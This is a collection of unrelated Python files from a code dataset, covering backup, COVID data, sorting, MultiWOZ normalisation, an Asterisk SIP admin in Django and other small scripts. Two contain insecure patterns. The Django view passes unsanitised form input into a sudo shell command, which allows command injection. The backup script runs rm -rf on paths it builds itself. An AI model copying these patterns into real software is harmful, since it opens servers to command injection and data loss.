isn't real\n\t\t\tprint(\"\\nERROR: path \\\"%s\\\" does not exist\"\n\t\t\t % path)\n\t\t\tprint(\"Try adding a / to the beginning of your path\\n\\n\")\n\t\t\n\nif __name__ == \"__main__\":\n\t##########\n\t# prints some details about the script to the console\n\t##########\n\tos.system(\"clear\")\n\tprint(\"BACKUP SCRIPT:\\n\")\n\tprint(\"NOTE: You should have already run the setup.py script to \"\n\t \"configure your\\nbackup directories. Otherwise this script \"\n\t \"will quit very quickly.\\n\\n\\n\")\n\t##########\n\t##########\n\t# attempts to load a configuration file in the current directory.\n\t# if it doesn't find one, it'll ask you for a directory to go to\n\t# and look for one there.\n\t##########\n\t##########\n\tdata = \"\"\n\tnot_found = True\n\ttry: # searches for the config file in your current directory\n\t\tf = open(\"config.json\", \"r\")\n\t\tdata = readwrite.read(f)\n\t\tnot_found = False\n\texcept: # if the config file is not found in the current directory\n\t\tprint(\"\\nERROR: file \\\"%s\\\" does not exist\\n\"\n\t\t\t % (os.getcwd() + \"/config.json\"))\n\t\tprint(\"Will now search for the config file in some other \"\n\t\t \"directory\\n\\n\")\n\t##########\n\t# if it doesn't find a config file in the current directory,\n\t# search for one in another directory\n\t##########\n\twhile not_found:\n\t\tpath = get_path(\"Enter an alternative directory to search \"\n\t\t \"for the config file in: \")\n\t\ttry:\n\t\t\tf = open(\"config.json\", \"r\")\n\t\t\tdata = readwrite.read(f)\n\t\t\tnot_found = False\n\t\texcept:\n\t\t\tos.system(\"clear\")\n\t\t\tprint(\"\\nERROR: file \\\"%s\\\" does not exist\\n\"\n\t\t\t % (path + \"/config.json\"))\n\t\t\tprint(\"We will now continue to search for the config file \"\n\t\t\t \"in some other directory\\n\")\n\n\t##########\n\t# start rsyncing\n\t##########\n\tmaximum = int(data['maximum'])\n\tprint(\"rm -rf %s/rsync.%s\" % (path, maximum))\n\tos.system(\"rm -rf %s/rsync.%s\" % (path, maximum))\n\tcount = maximum\n\twhile (count > 1):\n\t\tprint(\"mv %s/rsync.%s %s/rsync.%s\"\n\t\t % (path, count - 1, path, count))\n\t\tos.system(\"mv %s/rsync.%s %s/rsync.%s\"\n\t\t % (path, count - 1, path, count))\n\t\tcount -= 1\n\t# while\n\tprint(\"mv %s/rsync %s/rsync.1\" % (path, path))\n\tos.system(\"mv %s/rsync %s/rsync.1\" % (path, path))\n\n\t# Stopped here rsync -aP --link-dest=PATHTO/$PREVIOUSBACKUP $SOURCE $CURRENTBACKUP\n\t# https://blog.interlinked.org/tutorials/rsync_time_machine.html\n\tos.system(\"rsync -v -rlt -z --delete \\\"%s\\\" %s/rsync\"\n\t % (data[\"source\"], data[\"destination\"]))\n","sub_path":"src/backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":3441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"586279327","text":"from Death_cases import *\n\nnumfile = \"num.csv\"\ntotal_csv= \"confirm.csv\"\ndeath_csv = \"Death.csv\"\nrecovered_csv = \"recovered.csv\"\nallData = \"alldata.csv\"\nDate_csv = \"Date.csv\"\nwith open(numfile, newline='') as f:\n reader = csv.reader(f)\n Days = list(reader)\n\nwith open(total_csv) as csvfile:\n tlines = [line.split(\"\\n\", ) for line in csvfile.readlines()]\n Cases = [\" \".join(line) for line in tlines]\n\nwith open(death_csv) as csvfile:\n tlines = [line.split(\"\\n\", ) for line in csvfile.readlines()]\n Death = [\" \".join(line) for line in tlines]\n\nwith open(recovered_csv) as csvfile:\n tlines = [line.split(\"\\n\", ) for line in csvfile.readlines()]\n Recover = [\" \".join(line) for line in tlines]\n\nwith open(\"Date.csv\") as csvfile:\n tlines = [line.split(\"\\n\", ) for line in csvfile.readlines()]\n Date = [\" \".join(line) for line in tlines]\n\n#print(\"\\n S.no =\",Days)\n#print(\"\\n total cases = \",Cases)\n#print(\"\\n recover = \",recover)\n#print(\"\\n deaths = \",Death)\n\nded = Death\nday = Date\nrec = Recover\ncas = Cases\n\nf = open(\"alldata.csv\", \"w\")\n\nfor i in range(len(day)):\n f.write(\"{},{},{},{}\\n \".format(day[i], ded[i], rec[i], cas[i]))\n\nf.close()\n\nimport csv\nwith open(allData,newline='') as f:\n r = csv.reader(f)\n data = [line for line in r]\nwith open('Data.csv','w',newline='') as f:\n w = csv.writer(f)\n w.writerow(['Day','Dead','Recover','Total Case'])\n w.writerows(data)\n\n\n\n\n","sub_path":"Covid Prediction app/covid/covid_ml/Covid_Data.py","file_name":"Covid_Data.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"446987810","text":"import time\nimport random\nfrom demos import quicksort, mergesort\n\ndef create_random_list(size, max_val):\n ran_list = []\n for num in range(size):\n ran_list.append(random.randint(1,max_val))\n return ran_list\n\n# For those of you who are familiar with list comprehension covered\n# in section 3, the code in the function above can be written as below:\n\n# def create_random_list(size, max_val):\n# return [random.randint(1,max_val) for num in range(size)]\n\nsize = int(input(\"What size list do you want to create? \"))\nmax = int(input(\"What is the max value of the range? \"))\n\nl = create_random_list(size,max)\ntic = time.time()\nquicksort(l)\ntoc = time.time()\nprint(\"QS elapsed time -> \", toc-tic)\ntic = time.time()\nmergesort(l)\ntoc = time.time()\nprint(\"MS elapsed time -> \", toc-tic)\n","sub_path":"Python 3 Project-based Python, Algorithms, Data Structures/template/Section 4 Algorithms - Sort, performance, complexity and big O notation/70. Project phase 3/analyzer-c.py","file_name":"analyzer-c.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"341047003","text":"from collections.abc import Sequence, MutableMapping\r\nfrom concurrent.futures import ThreadPoolExecutor, Future\r\nfrom functools import wraps\r\n\r\nfrom distributed import default_client as dask_default_client\r\nfrom tornado import gen\r\n\r\nfrom .core import identity\r\n\r\nFILL_COLOR_LOOKUP = {\"dask\": \"cornflowerblue\", \"threads\": \"coral\"}\r\n\r\n\r\ndef result_maybe(future_maybe):\r\n if isinstance(future_maybe, Future):\r\n return future_maybe.result()\r\n else:\r\n if isinstance(future_maybe, Sequence) and not isinstance(\r\n future_maybe, str\r\n ):\r\n aa = []\r\n for a in future_maybe:\r\n aa.append(result_maybe(a))\r\n if isinstance(future_maybe, tuple):\r\n aa = tuple(aa)\r\n return aa\r\n elif isinstance(future_maybe, MutableMapping):\r\n for k, v in future_maybe.items():\r\n future_maybe[k] = result_maybe(v)\r\n return future_maybe\r\n\r\n\r\ndef delayed_execution(func):\r\n @wraps(func)\r\n def inner(*args, **kwargs):\r\n args = tuple([result_maybe(v) for v in args])\r\n kwargs = {k: result_maybe(v) for k, v in kwargs.items()}\r\n return func(*args, **kwargs)\r\n\r\n return inner\r\n\r\n\r\ndef executor_to_client(executor):\r\n executor._submit = executor.submit\r\n\r\n @wraps(executor.submit)\r\n def inner(fn, *args, **kwargs):\r\n wfn = delayed_execution(fn)\r\n return executor._submit(wfn, *args, **kwargs)\r\n\r\n executor.submit = inner\r\n\r\n @gen.coroutine\r\n def scatter(x, asynchronous=True):\r\n f = executor.submit(identity, x)\r\n return f\r\n\r\n executor.scatter = getattr(executor, \"scatter\", scatter)\r\n\r\n @gen.coroutine\r\n def gather(x, asynchronous=True):\r\n # If we have a sequence of futures await each one\r\n if isinstance(x, Sequence):\r\n final_result = []\r\n for sub_x in x:\r\n yx = yield sub_x\r\n final_result.append(yx)\r\n result = type(x)(final_result)\r\n else:\r\n result = yield x\r\n return result\r\n\r\n executor.gather = getattr(executor, \"gather\", gather)\r\n return executor\r\n\r\n\r\nthread_ex_list = []\r\n\r\n\r\ndef thread_default_client():\r\n if thread_ex_list:\r\n ex = thread_ex_list[0]\r\n if ex._shutdown:\r\n thread_ex_list.pop()\r\n ex = executor_to_client(ThreadPoolExecutor())\r\n thread_ex_list.append(ex)\r\n else:\r\n ex = executor_to_client(ThreadPoolExecutor())\r\n thread_ex_list.append(ex)\r\n return ex\r\n\r\n\r\nDEFAULT_BACKENDS = {\r\n \"dask\": dask_default_client,\r\n \"thread\": thread_default_client,\r\n}\r\n","sub_path":"rapidz/clients.py","file_name":"clients.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"360063690","text":"import sys\nimport csv\nimport xml.etree.ElementTree as ET\n\n\nif len(sys.argv) != 2:\n print(\"Usage: ToCSV.py file\")\n sys.exit()\n \n\nChar = ET.parse(sys.argv[1])\nroot = Char.getroot() \n\nprint(root.attrib['name'])\n\nOutputFile = \"csv/\" + root.attrib['name'] + \".csv\" \n\nwith open(OutputFile, 'w', newline='') as csvfile:\n MoveWriter = csv.writer(csvfile, delimiter=',')\n MoveWriter.writerow([\"Move ID\", \"Move\", \"Command\", \"hitLevel\", \"BlockFrame\", \"Punishable\", \"Duckable\"])\n for move in root.findall('moves/move'):\n if(len(move.findall(\"tags/Punishable\")) > 0):\n Punishable = True\n else:\n Punishable = False\n \n if(len(move.findall(\"tags/DuckableString\")) > 0):\n Duckable = True\n else:\n Duckable = False\n MoveWriter.writerow([move.findall(\"id\")[0].text, move.findall(\"name\")[0].text, move.findall(\"command\")[0].text, move.findall(\"hitLevel\")[0].text, move.findall(\"BlockFrame\")[0].text, Punishable, Duckable])\n","sub_path":"TekkenData/Movelists/ToCSV.py","file_name":"ToCSV.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"86398851","text":"#-*- encoding: utf-8 -*-\nimport json\nimport re\n\ntimepat = re.compile(\"\\d{1,2}[:]\\d{1,2}\")\npricepat = re.compile(\"\\d{1,3}[.]\\d{1,2}\")\ndef insertSpace(token, text):\n sidx = 0\n while True:\n sidx = text.find(token, sidx)\n if sidx == -1:\n break\n if sidx + 1 < len(text) and re.match('[0-9]', text[sidx - 1]) and \\\n re.match('[0-9]', text[sidx + 1]):\n sidx += 1\n continue\n if text[sidx - 1] != ' ':\n text = text[:sidx] + ' ' + text[sidx:]\n sidx += 1\n if sidx + len(token) < len(text) and text[sidx + len(token)] != ' ':\n text = text[:sidx + 1] + ' ' + text[sidx + 1:]\n sidx += 1\n return text\n\ndef normalize(text, replacements = []):\n # lower case every word\n text = text.lower()\n\n # replace white spaces in front and end\n text = re.sub(r'^\\s*|\\s*$', '', text)\n\n # hotel domain pfb30\n text = re.sub(r\"b&b\", \"bed and breakfast\", text)\n text = re.sub(r\"b and b\", \"bed and breakfast\", text)\n\n # normalize phone number\n ms = re.findall('\\(?(\\d{3})\\)?[-.\\s]?(\\d{3})[-.\\s]?(\\d{4,5})', text)\n if ms:\n sidx = 0\n for m in ms:\n sidx = text.find(m[0], sidx)\n if text[sidx - 1] == '(':\n sidx -= 1\n eidx = text.find(m[-1], sidx) + len(m[-1])\n text = text.replace(text[sidx:eidx], ''.join(m))\n\n # normalize postcode\n ms = re.findall('([a-z]{1}[\\. ]?[a-z]{1}[\\. ]?\\d{1,2}[, ]+\\d{1}[\\. ]?[a-z]{1}[\\. ]?[a-z]{1}|[a-z]{2}\\d{2}[a-z]{2})',\n text)\n if ms:\n sidx = 0\n for m in ms:\n sidx = text.find(m, sidx)\n eidx = sidx + len(m)\n text = text[:sidx] + re.sub('[,\\. ]', '', m) + text[eidx:]\n\n # weird unicode bug\n text = re.sub(u\"(\\u2018|\\u2019)\", \"'\", text)\n\n # replace time and and price\n text = re.sub(timepat, ' [value_time] ', text)\n text = re.sub(pricepat, ' [value_price] ', text)\n #text = re.sub(pricepat2, '[value_price]', text)\n\n # replace st.\n text = text.replace(';', ',')\n text = re.sub('$\\/', '', text)\n text = text.replace('/', ' and ')\n\n # replace other special characters\n text = text.replace('-', ' ')\n text = re.sub('[\\\":\\<>@\\(\\)]', '', text)\n\n # insert white space before and after tokens:\n for token in ['?', '.', ',', '!']:\n text = insertSpace(token, text)\n\n # insert white space for 's\n text = insertSpace('\\'s', text)\n\n # replace it's, does't, you'd ... etc\n text = re.sub('^\\'', '', text)\n text = re.sub('\\'$', '', text)\n text = re.sub('\\'\\s', ' ', text)\n text = re.sub('\\s\\'', ' ', text)\n for fromx, tox in replacements:\n text = ' ' + text + ' '\n text = text.replace(fromx, tox)[1:-1]\n\n # remove multiple spaces\n text = re.sub(' +', ' ', text)\n\n # concatenate numbers\n tmp = text\n tokens = text.split()\n i = 1\n while i < len(tokens):\n if re.match(u'^\\d+$', tokens[i]) and \\\n re.match(u'\\d+$', tokens[i - 1]):\n tokens[i - 1] += tokens[i]\n del tokens[i]\n else:\n i += 1\n text = ' '.join(tokens)\n return text\n## codes from multiwoz2.1 end\n\ndef restore_common_abbr(caption):\n # 还原常见缩写单词\n pat_is = re.compile(\"(it|he|she|that|this|there|here)(\\'s)\", re.I)\n pat_blank = re.compile(\"[\\t ]+\")\n pat_s = re.compile(\"(?<=[a-zA-Z])\\'s\") # 找出字母后面的字母\n pat_s2 = re.compile(\"(?<=s)\\'s?\")\n pat_not = re.compile(\"(?<=[a-zA-Z])n\\'t\") # not的缩写\n pat_would = re.compile(\"(?<=[a-zA-Z])\\'d\") # would的缩写\n pat_will = re.compile(\"(?<=[a-zA-Z])\\'ll\") # will的缩写\n pat_am = re.compile(\"(?<=[I|i])\\'m\") # am的缩写\n pat_are = re.compile(\"(?<=[a-zA-Z])\\'re\") # are的缩写\n pat_ve = re.compile(\"(?<=[a-zA-Z])\\'ve\") # have的缩写\n\n new_text = caption\n new_text = pat_is.sub(r\"\\1 is\", new_text)\n new_text = pat_blank.sub(\" \", new_text)#remove redundant blank space\n new_text = pat_s.sub(\"\", new_text)\n new_text = pat_s2.sub(\"\", new_text)\n new_text = pat_not.sub(\" not\", new_text)\n new_text = pat_would.sub(\" would\", new_text)\n new_text = pat_will.sub(\" will\", new_text)\n new_text = pat_am.sub(\" am\", new_text)\n new_text = pat_are.sub(\" are\", new_text)\n new_text = pat_ve.sub(\" have\", new_text)\n new_text = new_text.replace('\\'', ' ')\n return new_text\n\n\nTYPOS_CORRECT = 0\nGENERAL_TYPO = {\n # type\n \"guesthouse\":\"guest house\", \"guesthouses\":\"guest house\", \"guest\":\"guest house\", \"mutiple sports\":\"multiple sports\", \n \"sports\":\"multiple sports\", \"mutliple sports\":\"multiple sports\",\"swimmingpool\":\"swimming pool\", \"concerthall\":\"concert hall\", \n \"concert\":\"concert hall\", \"pool\":\"swimming pool\", \"night club\":\"nightclub\", \"mus\":\"museum\", \"ol\":\"architecture\", \n \"colleges\":\"college\", \"coll\":\"college\", \"architectural\":\"architecture\", \"musuem\":\"museum\", \"churches\":\"church\",\n # area\n \"center\":\"centre\", \"center of town\":\"centre\", \"near city center\":\"centre\", \"in the north\":\"north\", \"cen\":\"centre\", \"east side\":\"east\", \n \"east area\":\"east\", \"west part of town\":\"west\", \"ce\":\"centre\", \"town center\":\"centre\", \"centre of cambridge\":\"centre\", \n \"city center\":\"centre\", \"the south\":\"south\", \"scentre\":\"centre\", \"town centre\":\"centre\", \"in town\":\"centre\", \"north part of town\":\"north\", \n \"centre of town\":\"centre\", \"cb30aq\": \"none\",\n # price\n \"mode\":\"moderate\", \"moderate -ly\": \"moderate\", \"mo\":\"moderate\", \"moderately\": \"moderate\",\n # day\n \"next friday\":\"friday\", \"monda\": \"monday\", \"thur\": \"thursday\",\n # parking\n \"free parking\":\"free\",\n # internet\n \"free internet\":\"yes\",\n # star\n \"4 star\":\"4\", \"4 stars\":\"4\", \"0 star rarting\":\"none\",\n # others \n \"dont care\": \"dontcare\", \"y\":\"yes\", \"any\":\"dontcare\", \"n\":\"no\", \"does not care\":\"dontcare\", \"not men\":\"none\", \"not\":\"none\", \"not mentioned\":\"none\", \"not given\": \"none\",\n '':\"none\", \"not mendtioned\":\"none\", \"3 .\":\"3\", \"does not\":\"no\", \"fun\":\"none\", \"art\":\"none\", \"dont care\": \"dontcare\", \"don't care\": \"dontcare\", \"doesn't care\": \"dontcare\",\n \"w\": \"none\",\n # LBZ adding\n #restaurant name\n \"not(hamilton lodge)\": \"not hamilton lodge\",\n \"golden house golden house\": \"golen house\",\n # taxi-leave at\n \"0700\": \"07:00\", \"300\": \"03:00\", \"1615\": \"16:15\", \"20.00\": \"20:00\", \"16.30\": \"16:30\", \"21:4\": \"21:04\", \"1530\": \"15:30\", \"1145\": \"11:45\", \"1545\": \"15:45\", \"1745\": \"17:45\", \"1830\": \"18:30\",\n \"`1\": \"1\",\n \"02:45.\": \"02:45\",\n \"5:45\": \"05:45\",\n \"1:15\": \"01:15\",\n \"3:00\": \"03:00\",\n \"4:15\": \"04:15\",\n \"8:30\": \"08:30\",\n \"3:45\": \"03:45\",\n \"8:15\": \"08:15\",\n \"9:30\": \"09:30\",\n \"3:15\": \"03:15\",\n \"9:00\": \"09:00\",\n \"1:00\": \"01:00\",\n \"5:15\": \"05:15\",\n \"4:45\": \"04:45\",\n \"21:04\": \"21:04\",\n \"9:15\": \"09:15\",\n \"6:00\": \"06:00\",\n \"1700\": \"17:00\",\n \"5:30\": \"05:30\",\n \"1730\": \"17:30\",\n \"9:45\": \"09:45\",\n \"2:00\": \"02:00\",\n \"1:00\": \"01:00\",\n \"9:15\": \"09:15\",\n \"8:45\": \"08:45\",\n \"8:30\": \"08:30\",\n \"1030\": \"10:30\",\n \"7:54\": \"07:54\",\n \"2:30\": \"02:30\",\n \"9:30\": \"09:30\",\n \"13.29\": \"13:29\",\n \"1700\": \"17:00\",\n \"8:00\": \"08:00\",\n \"6:55\": \"06:55\",\n \"15.45\": \"15:45\",\n \"8:30\": \"08:30\",\n \"9:30\": \"09:30\",\n \"15.32\": \"15:32\",\n \"11.45\": \"11:45\",\n \"after 5:45 pm\": \"17:45\",\n \"09;45\": \"09:45\",\n \"11.24\": \"11:24\",\n \"11.45\": \"11:45\",\n \"18.15\": \"18:15\",\n # hotel book people\n \"six\": \"6\",\n \"3.\": \"3\",\n }\n\ndef fix_general_label_error(domain, slot, value):\n \"\"\"\n process label value\n \"\"\"\n if len(value) == 0:\n return \"\"\n \n if value in GENERAL_TYPO.keys():\n # general typo\n global TYPOS_CORRECT\n TYPOS_CORRECT += 1\n value = GENERAL_TYPO[value]\n # miss match slot and value\n if domain == \"hotel\" and (slot == \"type\" and value in [\"nigh\", \"moderate -ly priced\", \"bed and breakfast\", \"centre\", \"venetian\", \"intern\", \"a cheap -er hotel\"] or \\\n slot == \"internet\" and value == \"4\" or \\\n slot == \"price range\" and value == \"2\") or \\\n domain == \"attraction\" and slot == \"type\" and value in [\"gastropub\", \"la raza\", \"galleria\", \"gallery\", \"science\", \"m\"] or \\\n \"area\" in slot and value in [\"moderate\"] or \\\n \"day\" in slot and value == \"t\":\n value = \"none\"\n elif domain == \"hotel\" and slot == \"type\" and value in [\"hotel with free parking and free wifi\", \"4\", \"3 star hotel\"]:\n value = \"hotel\"\n elif domain == \"hotel\" and slot == \"star\" and value == \"3 star hotel\":\n value = \"3\"\n elif \"area\" in slot:\n if value == \"no\": value = \"north\"\n elif value == \"we\": value = \"west\"\n elif value == \"cent\": value = \"centre\"\n elif \"day\" in slot:\n if value == \"we\": value = \"wednesday\"\n elif value == \"no\": value = \"none\"\n elif \"price\" in slot and value == \"ch\":\n value = \"cheap\"\n elif \"internet\" in slot and value == \"free\":\n value = \"yes\"\n \n # some out-of-define classification slot values\n if domain == \"restaurant\" and slot == \"area\" and value in [\"stansted airport\", \"cambridge\", \"silver street\"] or \\\n domain == \"attraction\" and slot == \"area\" and value in [\"norwich\", \"ely\", \"museum\", \"same area as hotel\"]:\n value = \"none\"\n if domain == \"hotel\" and slot == 'name' and value in [\"no\", \"yes\"]:\n value = \"none\"\n if domain == \"restaurant\" and slot == 'name' and value in [\"no\", \"yes\"]:\n value = \"none\"\n return value\n\n\ndef normalize_state_value(domain, slot, value, replacements, remove_none = True):\n if value in [\"not mentioned\", \"none\", \"\"]:\n values = []\n elif \"|\" in value:\n # we do not fix multivalue label here\n values = []\n for item in value.split(\"|\"):\n value_i = fix_general_label_error(domain, slot, item.strip())\n value_i = normalize(value_i, replacements)\n value_i = restore_common_abbr(value_i)\n values.append(value_i)\n else:\n # fix some general errors\n value = fix_general_label_error(domain, slot, value)\n value = normalize(value, replacements)\n value = restore_common_abbr(value)\n values = [value]\n return values\n\ndef comparison_of_versions():\n base_path22 = \"./version22/data/\"\n data_files = {\n 10: base_path22 + \"MultiWOZ_1.0/data.json\",\n 20: base_path22 + \"MultiWOZ_2.0/data.json\",\n 21: base_path22 + \"MultiWOZ_2.1/data.json\",# val txt\n 22: base_path22 + \"MultiWOZ_2.2/data.json\",\n 23: \"./version23/data.json\",\n 24: \"./version24/data/data.json\"\n }\n\n val_files = {\n 10: base_path22 + \"MultiWOZ_1.0/valListFile.json\",\n 20: base_path22 + \"MultiWOZ_2.0/valListFile.json\",\n 21: base_path22 + \"MultiWOZ_2.1/valListFile.txt\",\n 22: base_path22 + \"MultiWOZ_2.1/valListFile.txt\",\n }\n\n test_files = {\n 10: base_path22 + \"MultiWOZ_1.0/testListFile.json\",\n 20: base_path22 + \"MultiWOZ_2.0/testListFile.json\",\n 21: base_path22 + \"MultiWOZ_2.1/testListFile.txt\",\n 22: base_path22 + \"MultiWOZ_2.1/testListFile.txt\",\n }\n data = {}\n for i in data_files:\n data[i] = json.load(open(data_files[i]))\n print(i, len(data[i].keys()))\n\nif __name__ == \"__main__\":\n pass\n\n","sub_path":"data/multiwoz/analyze_multiwoz.py","file_name":"analyze_multiwoz.py","file_ext":"py","file_size_in_byte":11550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"62553961","text":"n, m, k = (int(x) for x in input().split())\r\nA = [int(x) for x in input().split()]\r\nB = [int(x) for x in input().split()]\r\ntoLook = {}\r\nfor i in B:\r\n toLook[i] = 1\r\nl = 0\r\nr = 0\r\nfreq = {}\r\ncnt = 0 \r\nminm = 1000000\r\nwhile l < n:\r\n while r < n and cnt < k:\r\n if A[r] in toLook:\r\n if A[r] in freq:\r\n if freq[A[r]] == 0:\r\n cnt += 1\r\n freq[A[r]] += 1\r\n else:\r\n freq[A[r]] = 1\r\n cnt += 1\r\n r += 1\r\n if cnt >= k:\r\n if r - l < minm:\r\n minm = r - l\r\n else: break\r\n if A[l] in toLook:\r\n if A[l] in freq:\r\n if freq[A[l]] == 1:\r\n cnt -= 1\r\n freq[A[l]] -= 1\r\n l += 1\r\n\r\nif minm == 1000000: minm = -1\r\nprint(minm)","sub_path":"Shortest Length.py","file_name":"Shortest Length.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"523689521","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse, HttpRequest\nimport telnetlib, psutil, shlex, subprocess, os\n\n\n# Create your views here.\n\ndef index(request):\n return render(request, 'sip/page-login.html')\n\n\ndef login(request):\n HOST = \"127.0.0.1\"\n PORT = \"5038\"\n user = \"\"\n secret = \"\"\n tn = telnetlib.Telnet(HOST, PORT)\n if request.method == 'GET':\n data = request.GET\n user = 'Username:' + data['username']\n secret = 'Secret:' + data['password']\n elif request.method == 'POST':\n data = request.POST\n user = 'Username:' + data['username']\n secret = 'Secret:' + data['password']\n tn.write(b'Action:Login\\r\\n')\n tn.write(user.encode('ascii') + b'\\r\\n')\n tn.write(secret.encode('ascii') + b'\\r\\n')\n tn.write(b'\\r\\n')\n tn.write(b'Action:LogOff\\r\\n')\n tn.write(b'\\r\\n\\r\\n')\n response = tn.read_all()\n response = response.decode(\"UTF-8\")\n resp = \"Authentication accepted\" in response\n if resp:\n return redirect('dashboard')\n else:\n return redirect('connexion')\n\n\ndef dashboard(request):\n cmd = shlex.split(\"sudo /usr/sbin/asterisk -rx 'core show uptime'\")\n command = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n stdout, stderr = command.communicate()\n uptime = stdout.decode('UTF-8')\n cmd = shlex.split(\"sudo /usr/sbin/asterisk -rx 'sip show peers'\")\n command = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n stdout, stderr = command.communicate()\n entete = list(filter(None, stdout.decode('UTF-8').split('\\n')[0].split(' ')))\n result = stdout.decode('UTF-8').split('\\n')\n result.pop(0)\n result.pop()\n stat = result.pop()\n sips = []\n for element in result:\n elet = list(filter(None, element.split(' ')))\n sips.append({\n 'name': elet[0],\n 'hote': elet[1],\n 'port': elet[6],\n 'status': elet[7]\n })\n context = {\n 'uptime': uptime,\n 'pourcentage': int(psutil.virtual_memory()[2]),\n 'processeur': int(psutil.cpu_percent()),\n 'sip': sips,\n 'stat': stat\n }\n return render(request, 'sip/index.html', context)\n\n\ndef sip_index(request):\n cmd = shlex.split(\"sudo /usr/sbin/asterisk -rx 'sip reload'\")\n command = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n stdout, stderr = command.communicate()\n cmd = shlex.split(\"sudo /usr/sbin/asterisk -rx 'sip show peers'\")\n command = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n stdout, stderr = command.communicate()\n entete = list(filter(None, stdout.decode('UTF-8').split('\\n')[0].split(' ')))\n result = stdout.decode('UTF-8').split('\\n')\n result.pop(0)\n result.pop()\n stat = result.pop()\n sips = []\n for element in result:\n elet = list(filter(None, element.split(' ')))\n sips.append({\n 'name': elet[0],\n 'hote': elet[1],\n 'port': elet[6],\n 'status': elet[7]\n })\n context = {\n 'sip': sips,\n 'stat': stat\n }\n return render(request, 'sip/sip.html', context)\n\n\ndef sip_store(request):\n sip_user_info = \"\\n[{}](default_template) \\nfullname ={} \\nusername ={} \\nsecret={} \\nmailbox ={} \\ncontext=dept_1\".format(request.POST['extension'],request.POST['full_name'], request.POST['username'],request.POST['password'],request.POST['extension'])\n os.system(\"sudo bash -c 'echo \\\"{}\\\" >> /etc/asterisk/users.conf'\".format(sip_user_info))\n cmd = shlex.split(\"sudo /usr/sbin/asterisk -rx 'sip reload'\")\n command = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n stdout, stderr = command.communicate()\n return redirect('sip.index')\n","sub_path":"sip/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"300137785","text":"\"\"\"\nProblem:\n You are a professional robber planning to rob houses along a street.\n Each house has a certain amount of money stashed,\n the only constraint stopping you from robbing each of them is that\n adjacent houses have security system connected and\n it will automatically contact the police\n if two adjacent houses were broken into on the same night.\n\n Given a list of non-negative integers representing the amount of money\n of each house, determine the maximum amount of money you can rob tonight\n without alerting the police.\n\n Example 1:\n\n Input: [1,2,3,1]\n Output: 4\n Explanation: Rob house 1 (money = 1) and then rob house 3 (money = 3).\n Total amount you can rob = 1 + 3 = 4.\n Example 2:\n\n Input: [2,7,9,3,1]\n Output: 12\n Explanation:\n Rob house 1 (money = 2),\n rob house 3 (money = 9)\n and rob house 5 (money = 1).\n Total amount you can rob = 2 + 9 + 1 = 12.\n\"\"\"\n\nclass Solution:\n def rob(self, nums: list) -> int:\n if len(nums) == 0:\n return 0\n if len(nums) == 1:\n return nums[0]\n if len(nums) == 2:\n return max(nums[0], nums[1])\n\n # For every house after the second house, the maximum profit will either be\n # the current house + the profit of two houses ago, or don't rob the house.\n dp = [nums[0], max(nums[0], nums[1])]\n for i in range(2, len(nums)):\n res = max(nums[i]+dp[i-2], dp[i-1])\n dp.append(res)\n return dp[-1]\n\n\ndef test():\n nums = [1, 2, 3]\n s = Solution()\n res = s.rob(nums)\n assert res == 4\n\n\nif __name__ == '__main__':\n test()\n nums = eval(input('Please input an array: '))\n s = Solution()\n res = s.rob(nums)\n print(res)\n","sub_path":"problems/0198_house_robber.py","file_name":"0198_house_robber.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"316438183","text":"from tortoise import Model, fields\n\n\nclass Flat(Model):\n id = fields.IntField(pk=True)\n url = fields.CharField(null=False, max_length=2048, unique=True)\n price = fields.IntField(null=False)\n is_published = fields.BooleanField(default=False)\n\n created_at = fields.DatetimeField(auto_now_add=True)\n","sub_path":"src/db/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"213968099","text":"import numpy as np\nfrom PIL import Image\n\ndef standardize_stats(TRAIN_LEN, base_path):\n combined_data = np.zeros((TRAIN_LEN, 228, 228, 6))\n for i in range(TRAIN_LEN):\n annotation = np.load(base_path + '/box_annotations/' + str(i) + '.npy')\n combined_data[i] = annotation\n reshaped_data = combined_data.reshape((TRAIN_LEN*228*228), 6)\n reshaped_data = reshaped_data[np.squeeze(np.asarray(reshaped_data[:, 1])) != 228., :]\n np.set_printoptions(threshold=100)\n print(reshaped_data)\n mean = reshaped_data.mean(axis = 0)\n std = reshaped_data.std(axis = 0)\n return mean, std\n\nif __name__ == \"__main__\":\n TRAIN_LEN = 301\n base_path = '../WhitePlains_data/pixor/train'\n mean, std = standardize_stats(TRAIN_LEN, base_path)\n print(\"mean: \" + str(mean))\n print(mean.shape)\n print(\"std: \" + str(std))\n print(std.shape)\n np.save(\"train_mean\", mean)\n np.save(\"train_std\", std)\n \n ","sub_path":"pixor/train_labels_preprocessing.py","file_name":"train_labels_preprocessing.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} 